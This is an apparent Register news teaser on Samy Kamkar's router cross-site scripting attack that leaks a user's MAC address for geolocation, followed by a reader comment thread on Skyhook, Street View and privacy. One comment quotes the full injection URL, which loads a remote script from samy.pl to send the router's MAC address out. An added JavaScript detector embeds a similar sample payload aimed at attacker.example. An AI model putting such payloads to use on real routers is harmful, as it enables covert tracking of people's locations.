Hacker pilfers browser GPS location via router attack

If you're surfing the web from a wireless router supplied by some of the biggest device makers, there's a chance Samy Kamkar can identify your geographic location. That's because WiFi access points made by Westell and others are vulnerable to XSS, or cross-site scripting, attacks that can siphon a device's media access control …

COMMENTS

This topic is closed for new posts.
Thumb Up

Use this for good, not for evil

Does anyone know Osama Bin Laden's MAC address?

1
0
Stop

Skyhook

Anyone heard of Skyhook (www.skyhookwireless.com)? Guess what they keep a database of.

No need to hack the routers as many admins have purposefully given their MAC addresses out to be used in public. Helps you find your location when GPS is suffering from an adverse dose of echoed signals rather than direct ones from the orbiting satellites.

Doesn't sound like so much of a hack now does it?

Regards

Neil

0
0
Silver badge

Huh?

The hack is getting the MAC address off a user without their permission, therefore being able to find their position.

Knowing *where* a MAC is located isn't the issue

0
0
FAIL

Not accurate

I tested mine and it said I was in Inglewood, Los Angeles, USA.

Pity I'm in England, UK

0
0
Happy

The title is required, and must contain letters and/or digits.

At least it means the Black Helicopter brigade cannot find us!

My (UK based) is Washington DC, apparently.

0
0
Black Helicopters

be afraid

That's because that's where all your communications are being fed via by the guys with the copters

0
0
FAIL

Bogus!

Anybody bother to note the flaw in this? The MAC address is only valid on the immediate network connection. How can Google know about my MAC address after it passes through a router?

Maybe this is a California FIOS vulnerability.

0
0
Go

Android

Google's "Location Service", not sure about their web services, but certainly on Android, when Android registers with a WiFi network and you have 'Share my location data' and GPS enabled, then the MAC / SSID of the WiFi point you're connected to is sent to Google along with the GPS co-ordinates.

I know this because I have an Android phone, and when using WiFi location before enabling GPS, it used the nearest cell station, now it puts the pinpoint on my house, with roughly a 100m "accuracy".

Just another reason for NoScript - ABE stops sites accessing the local network.

1
0
Headmaster

Not bogus, rtfa.

The mac address isn't being extracted from the packets somewhere downstream, as you indeed correctly point out that couldn't work. What part of "http://192.168.1.1/index.cgi?active_page=9098&req_mode=0&mimic_button_field=goto%3a+9098..&button_value=9098&ssid=samy%20was%20here%3Cscript%20src=http://samy.pl/mapxss/fiospwn.js%3E%3C/script%3E" don't you understand? ;-)

It uses a cross-site request to access the router's admin page, and XSS to inject javascript into the html of that browser admin page that uses an XMLHttpRequest object to fetch the MAC address from the router and send it as a GET request parameter to a receiving script on the evil website. Relies only on HTTP between all the involved parties and no layer 2 properties at all. Should work anywhere. See http://samy.pl/mapxss/fiospwn.js for the internal details; the receiving script is http://samy.pl/mapxss/fiosmap.php and it expects the mac in "NN-NN-NN-NN-NN-NN" form as a url query string parameter named 'mac'.

2
0
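Added example, not part of the original comment or of Samy Kamkar's code: a JavaScript check, in the spirit of the NoScript ABE rule mentioned earlier in the thread, that flags a request when a page on a public origin targets a private address and a query parameter decodes to HTML markup. The function names and sample URLs are assumptions; the samples are constructed on the pattern of the request quoted above, with `attacker.example` as a placeholder host.

```javascript
// Added example (not from the thread). Sample URLs are constructed,
// modelled on the request quoted in the comment above.
const SAMPLE_INITIATOR = "http://attacker.example/map.html";
const SAMPLE_TARGET =
  "http://192.168.1.1/index.cgi?active_page=9098&req_mode=0" +
  "&ssid=demo%3Cscript%20src=http://attacker.example/x.js%3E%3C/script%3E";

// RFC 1918 private ranges plus loopback, applied only to dotted-quad hosts.
const DOTTED_QUAD = /^\d{1,3}(\.\d{1,3}){3}$/;
const PRIVATE_V4 = [/^10\./, /^192\.168\./, /^172\.(1[6-9]|2\d|3[01])\./, /^127\./];

function isLocalHost(host) {
  if (host === "localhost") return true;
  return DOTTED_QUAD.test(host) && PRIVATE_V4.some((re) => re.test(host));
}

// Names of query parameters whose percent-decoded value contains an HTML tag.
function markupParams(url) {
  const hits = [];
  for (const [name, value] of url.searchParams) {
    if (/<\s*\/?\s*[a-z!]/i.test(value)) hits.push(name);
  }
  return hits;
}

// Returns null for unparseable input, otherwise the two signals separately:
// publicToLocal is what an ABE-style rule blocks outright; markupParams shows
// which parameter a router page would have to HTML-encode before echoing it.
function classifyRequest(targetUrl, initiatorUrl) {
  let target, initiator;
  try {
    target = new URL(targetUrl);
    initiator = new URL(initiatorUrl);
  } catch {
    return null;
  }
  return {
    publicToLocal: isLocalHost(target.hostname) && !isLocalHost(initiator.hostname),
    markupParams: markupParams(target),
  };
}

console.log(classifyRequest(SAMPLE_TARGET, SAMPLE_INITIATOR));
```
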

Here's a title

============================

I know this because I have an Android phone, and when using WiFi location before enabling GPS, it used the nearest cell station, now it puts the pinpoint on my house, with roughly a 100m "accuracy".

============================

Exactly the same here. There's also different companies offering location based services using wifi, eg Navizon.

0
0

who cares.

so they know in which room my router is installed. big whoop.

0
1
Bronze badge
Black Helicopters

Doin' the Evil

The real story is Google is building a database mapping MACs to locations. A MAC alone doesn't provide any info so they must have quietly made deals with a lot of telcos and WiFi operators to gather data that normally isn't recorded for any length of time.

0
0
FAIL

Geographically Challenged

Sat in my living room in North East UK, and it says I'm in Downtown Madrid... maybe the snow's confusing it a little !

0
0
Silver badge

GPS?

Coordinates != GPS. Unless the Uncle Sam's Global Positioning System is used, it isn't GPS.

0
0
Thumb Up

Good fun

I put the MAC of my wireless AP in, and it came back accurate to within a couple of houses (In West London). It didn't know about the ethernet MAC, and I was unable to extract the DSL one from the web interface.

Maybe the street view cars collect the MACs of APs as they cruise around.

0
0

Link to his web site

Follow the link to his web site, see what happens.

0
0
Thumb Up

Skyhookwireless

Top marks to the man who said go look at Skyhook Wireless.

Skyhook's website has a reasonably detailed description of how they initially set up their database.

If you have Google Maps for Mobile on your phone, and WiFi on your phone, you are using Skyhook's services.

If the phone knows where it is (via GPS or via Skyhook) is it also potentially sniffing MAC addresses and updating not just your position on your map but also the locations in Skyhook's database of every MAC address it finds?

People might like to know. This is why I stopped using GMM.

0
0

How it all works

There was a talk about Skyhook Wireless and how it works at this year's Chaos Communication Congress:

http://events.ccc.de/congress/2009/Fahrplan/events/3600.en.html

It explains how all this works.

1
0
Go

Holy Yellow Pages Batman

I'm in the phone book too!! Just Damn!

0
0
Anonymous Coward

Wtf

MAC? Do they mean IP? If it some sort of database of MAC addresses, what happens when I buy a new router?

"It's actually scary how accurate it is": apparently I'm in Kingston; oh, now I'm in Crawley. I agree, very scary.

0
0
Paris Hilton

"If it some sort of database of MAC addresses"

"If it some sort of database of MAC addresses"

There's no "if", it *is* a database of MAC addresses and their geographical locations.

As you rightly point out, it is not 100% reliable, because MAC addresses aren't forever tied to the same place, and it is in principle possible for two bits of kit to have been modded to have the same MAC address.

But for a lot of MAC addresses a lot of the time it is horrifyingly accurate.

It does need something to ensure it is kept up to date, and grown to areas where it doesn't already have coverage. And what better for that than an on-the-quiet feed from every instance of Google Maps for Mobile on a WiFi-equipped phone? Nobody would expect Google to use people's data and activities for a rather different purpose than the end user was expecting, would they...

Everybody knows where Paris is, even Americans.

0
0
FAIL

Doesn't work here

Unsurprisingly, utter fail to locate my MAC.

0
0

Err...

It got me to within 10m of my house, all of the postcode, except the last two letters. I'm impressed and pissed off at the same time. I also don't have my wireless switched on all that often.

0
0
Black Helicopters

Google Street View?

The Skyhook writeup I read some time ago said they seeded their database by working with a (US) courier delivery company whose vans were already carrying GPS locators. Skyhook added WiFi scanners to the fleet so wherever the vans went, they picked up the MAC addresses and know where they are. SO everywhere the courier company has been, the MAC addresses and locations are known. If I remember rightly that was a one-off exercise.

Skyhook's chosen courier company don't get everywhere, but we know someone who has near-100% coverage within selected areas.

The Google Street View cars already have cameras and GPSs. If as they drive around in their target areas they are also scanning for WiFi MAC addresses (or BSSIDs as they seem to be called sometimes), you have near-100% coverage in a given area - at least till people buy a new router, move home, whatever.

Once Street View leave the area you're presumably back to random "crowdsourced" updates from folks with smartphones etc.

0
0
Anonymous Coward

Street View - RalphS was first

[AC 14:42 here]

Sorry RalphS, missed your earlier mention of Street View here. Respect anyway.

The WLAN MAC is (obviously) visible to a WiFi receiver, but the LAN (Ethernet) MAC is typically only going to be visible on the hardwired network. The DSL side of things doesn't have a MAC address as such. So the only interesting/useful one is the WLAN one.

0
0

This post has been deleted by a moderator

This post has been deleted by its author
